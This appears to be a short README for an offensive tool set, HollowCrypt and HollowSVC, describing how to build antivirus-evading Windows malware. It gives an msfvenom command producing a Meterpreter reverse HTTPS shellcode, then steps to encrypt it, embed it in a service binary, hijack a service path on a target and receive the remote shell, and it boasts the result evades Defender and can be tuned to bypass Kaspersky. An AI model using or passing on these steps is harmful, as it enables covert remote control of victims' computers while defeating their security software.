First, we need to create our shellcode:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 EXITFUNC=thread -f csharp
Then, edit the HollowCrypt source code , compile and execute:
After that, replace the encrypted shellcode in the HollowSVC source code. Now compile the service in the arch of your target, setup your listener, hijack the binary/path in the target and run!
Running service with path to HollowSVC executable:
Meterpreter retrieved:
Defender FUD, you will still need to implement OPSEC and be careful when launching meterpreter modules:
And remember, there is always ways to improve this! (Use HTTPS cert with meterpreter, load STDAPI afterwards receiving the callback, meterpreter auto-migrate module, use dynamic shellcode encoding ,custom shellcode, etc)Following those tips, you can bypass AVs like Kaspersky ;-)